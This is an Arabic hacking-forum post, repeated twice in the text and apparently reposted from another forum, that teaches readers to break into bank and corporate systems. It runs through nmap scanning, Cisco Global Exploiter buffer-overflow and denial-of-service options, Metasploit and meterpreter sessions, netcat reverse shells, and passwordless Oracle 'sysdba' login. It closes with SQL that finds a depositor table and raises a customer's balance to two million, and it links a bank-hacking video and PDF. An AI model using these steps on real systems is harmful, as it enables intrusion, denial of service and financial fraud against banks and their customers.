بحـث
المواضيع الأخيرة
اختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق
صفحة 1 من اصل 1
اختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق
السلام عليكم
حبيت ان أفيد كل هاكر مسلم محصور في أشياء صغيره في عالم الهاكر ويريد آن يتوسع من اجل ان ننافس قراصنة الغرب
الموضوع عباره عن مقدمه في اختراق البنوك وأنظمة قواعد البيانات والمشهوره oracle التي تستخدمها البنوك والشركات
المتطلبات والادوات للموضوع
Backtrack
Metasploit
Skills
Hacking skills
خبره في لغة sqlوقواعد البيانات
خبره في نظام linux
لكي تستفيد من الموضوع يجب عليك قرائه كل سطر وفهمه والتركيز
ولكي تصبح متقن لأختراق في المستوى العاالي يجب عليك ملم بخيره ولو جديه بلغة sql
و oracle sql ومعرفه قويه في اوامر نظام التشغيل linux
لأن البنوك والشركات تستخدم قواعد بيانات oracle sql و sql servermicrosoft وشبكات السيسكو ciscoولكي تستطيع التحكم يجب عليك المعرفة بهذه الانظمه
في هاكرز عرب كثير لا يفهم في البرمجه ولا السيطره على انظمه اللينكس ويريد اختراق بنوك
لو جبت لك جهاز بنك او شركه ونت لا تعرف اللينكس ولا الاوراكل اس كي وال ما رح تقدر تسوي شي ولو معاك كل الباسوردات
من هنا ينطلق الموضوع
بسم الله نبداء
قبل أي شي في أي خطوه لأختراق نظام هي معرفة مكوناته software لأن الثغرات هي تصيب البرمجيات
وهناك طرق اخرى للأختراق من دون ثغرات مثل الدخول العنيف
جبت لكم جدول يبين الانظمه المستخدمه في الشركات والبنوك وشركة الاتصالات في الاغلب
طبعا الشرح رح يهتم على انظمة اوراكل لقواعد البيانات والسيسكو وكمان بعض الثغرات
طبعا اثمن شي في البنوك والشركات هي قواعد البيانات
وهذا ما رح يتمركز الحوار
وكيفية ايجاد الشبكات المصابه وهذا سهل رح اشرحه لكم ايضا
والادوات المستخدمه في الشرح هي نظام الباك تراك والميتاسبوليت
::::الخطوه الاولى:::::::
فحص الهدف
وهي كالعاده عمل اسكان عبر الايبي وهذي الخطوه تستخدم في جميع الاختراقات سواء مواقع او سيرفرات او اجهزة
طبعا في النوك والشركات تفحص البرامج المركبه والبورتات المفتوحه
ورح نستخدم اداة nmap
طبعا ما رح اشرح الاداه لأنك لما تشوف هذا الموضوع على الاقل تكون فاهم الاساسيات وما رح اشرح للمبتدئن كيف
يلا رح انازل ههههههه تسوي الامر
Nmap –sV xx.xx.xx.xx
شوفوا لصوره هذي
=-=-=-==-=-=-=-=-
الان عرفنا ان الهدف معاهم نضام اوراكل
وكمان هناك سيرفرات تحتوي على نضام السيسكو
والان عرفنا الهدف ايش مركب من نضام
قبل ما ندخل في التطبيق رح اشرح انواع الانضمه
اولا انظمة قواعد البيانات
هناك شركات صنعت DBMS والي تدير قواعد البيانات
مثل شركة ارواكل وميكروسوفت
وهناك انظمه مخصصه مثل انظمه وزارة الدفاع الامريكيه
شوفو هذا واجهة النظام مخصص
الموضوع الأصلى من هنا: منتديات القرصان http://www.alkrsan.net/hack-servers-and-sites-and-forums/61373-ciencth-caeaeaess-aeaaeuae-thaecui-caeicaece-dbms-oni-ecaoaen-caciaece-eoeith.html
ومثلا انظمه الاوراكل هذي واجه لتسجيل الدخول
طبعا لأقتحام أي نضام لازم تعرف اول شي كيف تتصل للنضام وماذا يريد النضام منك للأتصال
طبعا انا ما رح اشرح الحاجات الاساسيه في هذه الدوره بس بشرح النقاط التي تمكنك من فهم اختراق الانظمه للمؤسسات والشركات
الان نتوجه الى الخطوه الثانيه
:::::الخطوه الثانيه الاختراق:::::::
رح ابداء معاكم في اختراق شبكات السيسكو الي اغلب الشركات تعمل عليها
طبعا لأختراق شبكات السيسكو هناك اداوت موجوده على الباك تراك
ونت لازم يكون معاك نضام اختراق قوي مثل الباك تراك للهجوم من هذا النوع
نفتح الباك تراك
نفتح الشل ونتوجه للمسار
Cd /pentest/cisco/cisco-global-exploiter
طبعا توجد اداه اسمها
Cge.pl
هذي هي اداة الاختراق لشبكات السيسكو الي تستثمر عدة انواع من الثغرات مثل البفر وكمان تعمل هجوم نكران الخدمه يهني توقف الشبكاه كامل
لكي تشغل الاداه تكتب الامر
Perl cge.pl
ورح يشرح لك الاستخدام والثغرات بالترقيم
شاهد الصوره
طبعا استخدام الاده تكون
هي
Perl cge.pl xx.xx.xx.xx option
نوع الهجومOption=
بعد ماختار نوع الهجوم مثل buufer overflow
والاتصال العكسي او التل نت
او انك تختار
Denial of services توقف عمل الشبكه وتشلها
طبعا اهم شي انك توصل للمعومات وهذا اهم شي يهم المهاجم
ونت لازم تحاول للأتصال عكسيا وهذا اهم شي وسوف تعرفون السبب في بقيه الدوره
الان عرفنا من اهم الخطوات في بداية الاختراق
خلونا نراجع
نسوي اسكان
نعرف البرامج المركبه على الهدف
ايجاد ثغرات البرامج الانظمه
استثمار ثغرات الانظمه او البرامج المركبه
تم الاقتحام يعني وصلنا للجهاز
الان كل الي شرحناه انت المفروض تكون عارفه وأكيد ما تتوقع ان اختراق انظمة المؤسسات والشركات بهذه السهوله ومثل أي اختراق
بس الصعوبه بعد ما تقتحم النظام
ايش هي الاجرائات الي رح تسويها
=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
::::الخطوه الثالثه الهجوم على النظام::::
قبل ما تبداء الهجوم على الانظمه
اولا اعرف ماذا تريد الحصول عليه وما هو نوع النظام وكيفية الدخول اليه
طبعا رح اشرح لكم اسهل شي وهو اقتحام اشهر انظمة ادارة قواعد البيانات وهي الاوراكل والاغلب المستخدمه في الشركات
الان رح نبداء الهجوم
اول رح نبداء كيف نجمع معلومات قد تحتاجها في بعض العمليات في اختراق قواعد البيانات
مثلا اشهر شي وهي SID وأيجاده سهل جدا عبر الميتا سبلويت ونحن لن نحتاجه في علمية الاختراق تبعنا في اخر الدرس ولكن مجرد شرح قد تحتاجه في المستقبل
ما رح اشرح كثير انتم اكتفو باهذي الصورتين
وهذه الصوره بعد التنفيذ
SID=orcl
SID=PLSExProc
وهناك ادوات كثيره مساعده في اختراق الاوراكل اكتب انت في console
الامر search oracle
ورح تظهر لك كل الثغرات التي نزلت على هذي الانظمه وكمان ادوات مساعده
طبعا SID رح يساعدك في اقتحام باسورد النظام ولكن انا بجيب لك طرق تقتحم النظام من دون باسورد
والتي تدعهما اداه في الباك تراك اسم الاداه والمسار موجود في الصوره
طبعا انت حاول توصل للاتصال للسيرفر من عبر أي ثغره او انك تخترق السيرفر عبر ال Fast Track في الباك تراك
وهذي اخر الخطوات في الاختراق سواء عبر الفاست تراك في الباك تراك او عبر الميتا سبلويت
واهم شي في الصور كما رح تشوفوا انه دخلنا للدوز تبع الضحيه
طبعا نكتب الامر
Sessions –l
لعرض الاتصالات المتكونه
ولدخول للاتصال نكتب
Session –I 1
حيث 1 رقم الاتصال ويمكن ان يكون معاك عدة اتصالات
الصوره السابقه لنجاح استثمار ثغره من الثغرات والاتصال meterpreter
اما الصوره هذي للدخول الى النظام للدوز بالامر
Use –m process
Execute –f cmd.exe
في حالة عدم الدخول للدوز تبع الضحيه تنفذ الامر
حبيت ان أفيد كل هاكر مسلم محصور في أشياء صغيره في عالم الهاكر ويريد آن يتوسع من اجل ان ننافس قراصنة الغرب
الموضوع عباره عن مقدمه في اختراق البنوك وأنظمة قواعد البيانات والمشهوره oracle التي تستخدمها البنوك والشركات
المتطلبات والادوات للموضوع
Backtrack
Metasploit
Skills
Hacking skills
خبره في لغة sqlوقواعد البيانات
خبره في نظام linux
لكي تستفيد من الموضوع يجب عليك قرائه كل سطر وفهمه والتركيز
ولكي تصبح متقن لأختراق في المستوى العاالي يجب عليك ملم بخيره ولو جديه بلغة sql
و oracle sql ومعرفه قويه في اوامر نظام التشغيل linux
لأن البنوك والشركات تستخدم قواعد بيانات oracle sql و sql servermicrosoft وشبكات السيسكو ciscoولكي تستطيع التحكم يجب عليك المعرفة بهذه الانظمه
في هاكرز عرب كثير لا يفهم في البرمجه ولا السيطره على انظمه اللينكس ويريد اختراق بنوك
لو جبت لك جهاز بنك او شركه ونت لا تعرف اللينكس ولا الاوراكل اس كي وال ما رح تقدر تسوي شي ولو معاك كل الباسوردات
من هنا ينطلق الموضوع
بسم الله نبداء
قبل أي شي في أي خطوه لأختراق نظام هي معرفة مكوناته software لأن الثغرات هي تصيب البرمجيات
وهناك طرق اخرى للأختراق من دون ثغرات مثل الدخول العنيف
جبت لكم جدول يبين الانظمه المستخدمه في الشركات والبنوك وشركة الاتصالات في الاغلب
طبعا الشرح رح يهتم على انظمة اوراكل لقواعد البيانات والسيسكو وكمان بعض الثغرات
طبعا اثمن شي في البنوك والشركات هي قواعد البيانات
وهذا ما رح يتمركز الحوار
وكيفية ايجاد الشبكات المصابه وهذا سهل رح اشرحه لكم ايضا
والادوات المستخدمه في الشرح هي نظام الباك تراك والميتاسبوليت
::::الخطوه الاولى:::::::
فحص الهدف
وهي كالعاده عمل اسكان عبر الايبي وهذي الخطوه تستخدم في جميع الاختراقات سواء مواقع او سيرفرات او اجهزة
طبعا في النوك والشركات تفحص البرامج المركبه والبورتات المفتوحه
ورح نستخدم اداة nmap
طبعا ما رح اشرح الاداه لأنك لما تشوف هذا الموضوع على الاقل تكون فاهم الاساسيات وما رح اشرح للمبتدئن كيف
يلا رح انازل ههههههه تسوي الامر
Nmap –sV xx.xx.xx.xx
شوفوا لصوره هذي
=-=-=-==-=-=-=-=-
الان عرفنا ان الهدف معاهم نضام اوراكل
وكمان هناك سيرفرات تحتوي على نضام السيسكو
والان عرفنا الهدف ايش مركب من نضام
قبل ما ندخل في التطبيق رح اشرح انواع الانضمه
اولا انظمة قواعد البيانات
هناك شركات صنعت DBMS والي تدير قواعد البيانات
مثل شركة ارواكل وميكروسوفت
وهناك انظمه مخصصه مثل انظمه وزارة الدفاع الامريكيه
شوفو هذا واجهة النظام مخصص
الموضوع الأصلى من هنا: منتديات القرصان http://www.alkrsan.net/hack-servers-and-sites-and-forums/61373-ciencth-caeaeaess-aeaaeuae-thaecui-caeicaece-dbms-oni-ecaoaen-caciaece-eoeith.html
ومثلا انظمه الاوراكل هذي واجه لتسجيل الدخول
طبعا لأقتحام أي نضام لازم تعرف اول شي كيف تتصل للنضام وماذا يريد النضام منك للأتصال
طبعا انا ما رح اشرح الحاجات الاساسيه في هذه الدوره بس بشرح النقاط التي تمكنك من فهم اختراق الانظمه للمؤسسات والشركات
الان نتوجه الى الخطوه الثانيه
:::::الخطوه الثانيه الاختراق:::::::
رح ابداء معاكم في اختراق شبكات السيسكو الي اغلب الشركات تعمل عليها
طبعا لأختراق شبكات السيسكو هناك اداوت موجوده على الباك تراك
ونت لازم يكون معاك نضام اختراق قوي مثل الباك تراك للهجوم من هذا النوع
نفتح الباك تراك
نفتح الشل ونتوجه للمسار
Cd /pentest/cisco/cisco-global-exploiter
طبعا توجد اداه اسمها
Cge.pl
هذي هي اداة الاختراق لشبكات السيسكو الي تستثمر عدة انواع من الثغرات مثل البفر وكمان تعمل هجوم نكران الخدمه يهني توقف الشبكاه كامل
لكي تشغل الاداه تكتب الامر
Perl cge.pl
ورح يشرح لك الاستخدام والثغرات بالترقيم
شاهد الصوره
طبعا استخدام الاده تكون
هي
Perl cge.pl xx.xx.xx.xx option
نوع الهجومOption=
بعد ماختار نوع الهجوم مثل buufer overflow
والاتصال العكسي او التل نت
او انك تختار
Denial of services توقف عمل الشبكه وتشلها
طبعا اهم شي انك توصل للمعومات وهذا اهم شي يهم المهاجم
ونت لازم تحاول للأتصال عكسيا وهذا اهم شي وسوف تعرفون السبب في بقيه الدوره
الان عرفنا من اهم الخطوات في بداية الاختراق
خلونا نراجع
نسوي اسكان
نعرف البرامج المركبه على الهدف
ايجاد ثغرات البرامج الانظمه
استثمار ثغرات الانظمه او البرامج المركبه
تم الاقتحام يعني وصلنا للجهاز
الان كل الي شرحناه انت المفروض تكون عارفه وأكيد ما تتوقع ان اختراق انظمة المؤسسات والشركات بهذه السهوله ومثل أي اختراق
بس الصعوبه بعد ما تقتحم النظام
ايش هي الاجرائات الي رح تسويها
=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
::::الخطوه الثالثه الهجوم على النظام::::
قبل ما تبداء الهجوم على الانظمه
اولا اعرف ماذا تريد الحصول عليه وما هو نوع النظام وكيفية الدخول اليه
طبعا رح اشرح لكم اسهل شي وهو اقتحام اشهر انظمة ادارة قواعد البيانات وهي الاوراكل والاغلب المستخدمه في الشركات
الان رح نبداء الهجوم
اول رح نبداء كيف نجمع معلومات قد تحتاجها في بعض العمليات في اختراق قواعد البيانات
مثلا اشهر شي وهي SID وأيجاده سهل جدا عبر الميتا سبلويت ونحن لن نحتاجه في علمية الاختراق تبعنا في اخر الدرس ولكن مجرد شرح قد تحتاجه في المستقبل
ما رح اشرح كثير انتم اكتفو باهذي الصورتين
وهذه الصوره بعد التنفيذ
SID=orcl
SID=PLSExProc
وهناك ادوات كثيره مساعده في اختراق الاوراكل اكتب انت في console
الامر search oracle
ورح تظهر لك كل الثغرات التي نزلت على هذي الانظمه وكمان ادوات مساعده
طبعا SID رح يساعدك في اقتحام باسورد النظام ولكن انا بجيب لك طرق تقتحم النظام من دون باسورد
والتي تدعهما اداه في الباك تراك اسم الاداه والمسار موجود في الصوره
طبعا انت حاول توصل للاتصال للسيرفر من عبر أي ثغره او انك تخترق السيرفر عبر ال Fast Track في الباك تراك
وهذي اخر الخطوات في الاختراق سواء عبر الفاست تراك في الباك تراك او عبر الميتا سبلويت
واهم شي في الصور كما رح تشوفوا انه دخلنا للدوز تبع الضحيه
طبعا نكتب الامر
Sessions –l
لعرض الاتصالات المتكونه
ولدخول للاتصال نكتب
Session –I 1
حيث 1 رقم الاتصال ويمكن ان يكون معاك عدة اتصالات
الصوره السابقه لنجاح استثمار ثغره من الثغرات والاتصال meterpreter
اما الصوره هذي للدخول الى النظام للدوز بالامر
Use –m process
Execute –f cmd.exe
في حالة عدم الدخول للدوز تبع الضحيه تنفذ الامر
Interact 1
كما في الصوره
او ان نتصل اتصال عكسي عبر النت كات بتنفيذ shellcode طبعا بعد اختراق للسيرفر عبر ثغره buffer overflow
بدايه نقوم بالتنصت
بعد نجاح الاتصال
الان تم الاختراق والخطوه القادمه في الجزء التالي من الشرح
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
طبعا الان وصلنا الى المطلوب وهو النظام السؤال الان كيف ندخل الى نظام قواعد البيانات لكي نسوي الي جينا من اجله ^_^
في انظمه الاواكل تستطيع الوصول للنظام عبر الدوز بالأمر
Sqlplus
وهذا هو أهم أمر ورح يدخلك الى نظام قواعد البيانات
طبعا اكيد رح يطلب منك اليوزر والباسورد
هنا للأقتحام معانا طريقتين
الطريقه الاولى انك تكتب اليوزر system
وهو اسم المستخدم للنظام في الانظمه الاوراكل
وتخمن الباسورد او تستخدم طريقة ملك الهاكرز كيفن ميتنك في الهندسه الاجتماعيه كان يتصل لأحد الموضفين ويقول انه من احد جهات الصيانه ويطلب اليوزر والباسورد بس هذا شي صار صعب وحتى لو كان ينفع نادرا
الطريقه الثانيه وهي الأضمن للاقتحام انك تكتب في خانة المستخدم
System as sysdba
وهي اختصار الى
System administration
يعني مدير النظام
وتضغط enter ورح يطلب الباسورد ونت طنش وضغط enter مره اخره ورح تدخل من دون طلب كلمة السر
كما في الصوره
مبروك عليك الاقتحام انت الان صرت داخل النظام بصلاحية مدير النظام اكبر صلاحيه يعني تقدر تستعرض الملومات وتعدل وكل شي وهذا الي يهم المقتحم
طبعا الان انت مخترق النظام من اجل استعراض جدول معين او سرقة معلومات او تعديل على معلومات مثلا تعديل على ارصده ومعاك الصلاحيات بس واجهت مشكله معرفة الجداول
رح نضرب مثل وليكن التعديل على الرصيد ولا تعرف اسم الجدول او صيغة الجدول كيف هي
المشكله هذي تحل بسهوله
مع كتابة الامر
SELECT * FROM user_catalog;
طبعا رح تظهر لك الجداول غير مرتبه ولكي تعرضها مرتبه ننفذ الامر
select *from cat
order by TABLE_NAME;
كما في الصوره
طبعا يعرض كل الجداول ونت شوف الجدول الي تريد تستعرض المعلومات منه او التعديل عليه
طبعا للعلم ان البنوك تستخدم الجدول اليه فيه المعلومات المهمه عن الرصيد depositor
والتي تعني المودعون
ويختلف من نضام الى نظام مثلا قد يكون accounts or clients
طيب الان وجدنا الجدول المطلوب لكي تعرف الاعمده الي فيه والبيانات تكتب الامر
Desc depositor
ورح يعرض لك معلومات الجدول كما في الصوره
الان عدينا مرحله بل مراحل طوال لكي نوصل الى ما وصلنا اليه الان وسوف نقوم حاليا بالاستعلام على رصيد احد العملاء وليكن اسمه john الذي يحمل الرقم 1009
الان نريد نستخرج اسم العميل والرصيد المتوفر له
بنسوي الامر
Select name,balance from depositor where id=1009;
طبعا لكي تعرض كل المعلومات تختصر الامر وتسوي * بدل اسماء الاعمده
شاهدو الصوره
الان نريد نرفع الرصيد الى 2 مليون طبعا انت لازم يكون معاك خبره في اوامر sql ورح ننفذ امر التحديث والي هو update ورح تكون الصيغه
Update depositor
Set balance=2000000
Where id=1009;
ورح تضهر لك رساله تم التعديل بس في الشرح الرساله مش معرفه بالغه النظام المخترق
كما في الصوره
الان نتأكد من التعديل وننفذ الامر الاول
DONE
هذا فيديوا في اختراق بنك ليس كما شرحناه باختراق اوراكل وأنما sql server تبع شركة مايكروسوفت
نفس الخطوات فحص واستثمار الثغرات وقتحام النظام
الفيديوا
hacked bank Download ● Download Center to 100 mb
رابط اخر
اختراق سيرفرات البنوك.rar
والى هنا وصلنا الى نهاية المطاف وهذا ليس كل الطرق التي يتم بها الاختراق وهناك طرق اخرى مثل Remote client وهي طريقه معقده شويه
الشرح كان محاكاه الى واقع الاختراق العملي وأهم شي من الشرح كان فهم الفكره في الاختراق والخطوات الصحيحه للهجوم وهذا ما ينقص الهاكر وانا متأكد من اغلب الخطوات كانت معرفوه لدى الهاكر متوسطي المستوى والمحترفين بس النقص كان كيف يشغل المهارات ..
وانا هنا اتوقف عن الشرح وأرجوا الاستخدام فيما ينفع الامه الاسلاميه وليس ما يضرها
تحميل الشرح بصيغة كتاب pdf
اختراق البنوك وأنظمة قواعد البيانات.rar
http://www.mediafire.com/?olr77dw3pq4en5i
او ان نتصل اتصال عكسي عبر النت كات بتنفيذ shellcode طبعا بعد اختراق للسيرفر عبر ثغره buffer overflow
بدايه نقوم بالتنصت
بعد نجاح الاتصال
الان تم الاختراق والخطوه القادمه في الجزء التالي من الشرح
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
طبعا الان وصلنا الى المطلوب وهو النظام السؤال الان كيف ندخل الى نظام قواعد البيانات لكي نسوي الي جينا من اجله ^_^
في انظمه الاواكل تستطيع الوصول للنظام عبر الدوز بالأمر
Sqlplus
وهذا هو أهم أمر ورح يدخلك الى نظام قواعد البيانات
طبعا اكيد رح يطلب منك اليوزر والباسورد
هنا للأقتحام معانا طريقتين
الطريقه الاولى انك تكتب اليوزر system
وهو اسم المستخدم للنظام في الانظمه الاوراكل
وتخمن الباسورد او تستخدم طريقة ملك الهاكرز كيفن ميتنك في الهندسه الاجتماعيه كان يتصل لأحد الموضفين ويقول انه من احد جهات الصيانه ويطلب اليوزر والباسورد بس هذا شي صار صعب وحتى لو كان ينفع نادرا
الطريقه الثانيه وهي الأضمن للاقتحام انك تكتب في خانة المستخدم
System as sysdba
وهي اختصار الى
System administration
يعني مدير النظام
وتضغط enter ورح يطلب الباسورد ونت طنش وضغط enter مره اخره ورح تدخل من دون طلب كلمة السر
كما في الصوره
مبروك عليك الاقتحام انت الان صرت داخل النظام بصلاحية مدير النظام اكبر صلاحيه يعني تقدر تستعرض الملومات وتعدل وكل شي وهذا الي يهم المقتحم
طبعا الان انت مخترق النظام من اجل استعراض جدول معين او سرقة معلومات او تعديل على معلومات مثلا تعديل على ارصده ومعاك الصلاحيات بس واجهت مشكله معرفة الجداول
رح نضرب مثل وليكن التعديل على الرصيد ولا تعرف اسم الجدول او صيغة الجدول كيف هي
المشكله هذي تحل بسهوله
مع كتابة الامر
SELECT * FROM user_catalog;
طبعا رح تظهر لك الجداول غير مرتبه ولكي تعرضها مرتبه ننفذ الامر
select *from cat
order by TABLE_NAME;
كما في الصوره
طبعا يعرض كل الجداول ونت شوف الجدول الي تريد تستعرض المعلومات منه او التعديل عليه
طبعا للعلم ان البنوك تستخدم الجدول اليه فيه المعلومات المهمه عن الرصيد depositor
والتي تعني المودعون
ويختلف من نضام الى نظام مثلا قد يكون accounts or clients
طيب الان وجدنا الجدول المطلوب لكي تعرف الاعمده الي فيه والبيانات تكتب الامر
Desc depositor
ورح يعرض لك معلومات الجدول كما في الصوره
الان عدينا مرحله بل مراحل طوال لكي نوصل الى ما وصلنا اليه الان وسوف نقوم حاليا بالاستعلام على رصيد احد العملاء وليكن اسمه john الذي يحمل الرقم 1009
الان نريد نستخرج اسم العميل والرصيد المتوفر له
بنسوي الامر
Select name,balance from depositor where id=1009;
طبعا لكي تعرض كل المعلومات تختصر الامر وتسوي * بدل اسماء الاعمده
شاهدو الصوره
الان نريد نرفع الرصيد الى 2 مليون طبعا انت لازم يكون معاك خبره في اوامر sql ورح ننفذ امر التحديث والي هو update ورح تكون الصيغه
Update depositor
Set balance=2000000
Where id=1009;
ورح تضهر لك رساله تم التعديل بس في الشرح الرساله مش معرفه بالغه النظام المخترق
كما في الصوره
الان نتأكد من التعديل وننفذ الامر الاول
DONE
هذا فيديوا في اختراق بنك ليس كما شرحناه باختراق اوراكل وأنما sql server تبع شركة مايكروسوفت
نفس الخطوات فحص واستثمار الثغرات وقتحام النظام
الفيديوا
hacked bank Download ● Download Center to 100 mb
رابط اخر
اختراق سيرفرات البنوك.rar
والى هنا وصلنا الى نهاية المطاف وهذا ليس كل الطرق التي يتم بها الاختراق وهناك طرق اخرى مثل Remote client وهي طريقه معقده شويه
الشرح كان محاكاه الى واقع الاختراق العملي وأهم شي من الشرح كان فهم الفكره في الاختراق والخطوات الصحيحه للهجوم وهذا ما ينقص الهاكر وانا متأكد من اغلب الخطوات كانت معرفوه لدى الهاكر متوسطي المستوى والمحترفين بس النقص كان كيف يشغل المهارات ..
وانا هنا اتوقف عن الشرح وأرجوا الاستخدام فيما ينفع الامه الاسلاميه وليس ما يضرها
تحميل الشرح بصيغة كتاب pdf
اختراق البنوك وأنظمة قواعد البيانات.rar
http://www.mediafire.com/?olr77dw3pq4en5i
مواضيع مماثلة
» اختراق البنوك وأنظمة قواعد البيانات dbms شرح بالصور + الادوات + تطبيق
» الفيس بوك يطلق تطبيق جديد لمنع الأنتحار
» اختراق الاميل عن طريق الاضافة
» طرق بعشرات الآلاف تستطيع بها اختراق فيسبوك
» الفيس بوك : 600 ألف محاولة اختراق لحسابات المستخدمين يوميا
» الفيس بوك يطلق تطبيق جديد لمنع الأنتحار
» اختراق الاميل عن طريق الاضافة
» طرق بعشرات الآلاف تستطيع بها اختراق فيسبوك
» الفيس بوك : 600 ألف محاولة اختراق لحسابات المستخدمين يوميا
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى
18/10/2016, 22:13 من طرف Admin
» le programme des cours de chaque module
18/10/2016, 22:01 من طرف Admin
» les modules de 1ère année français
18/10/2016, 21:53 من طرف Admin
» طريقة تعبئة بطاقة 4G الخاصة في الجزائر
28/10/2015, 00:58 من طرف Admin
» بحث شامل حول الوظيف العمومي و تسيير الموارد البشرية
27/10/2015, 23:55 من طرف Admin
» استخراج شهادة الجنسية و السوابق القضائية عن طريق الانترنت
27/10/2015, 23:09 من طرف Admin
» ☛ ☢ ☣ Join now for 7$ AND get 6000$/MONTH ☢ ☣ ☚
24/7/2015, 10:57 من طرف Admin
» Make more than 100$ a day :) with Trafficmonsoon
22/5/2015, 23:56 من طرف Admin
» بحث حول التحفيز و التدريب
7/3/2015, 01:38 من طرف Admin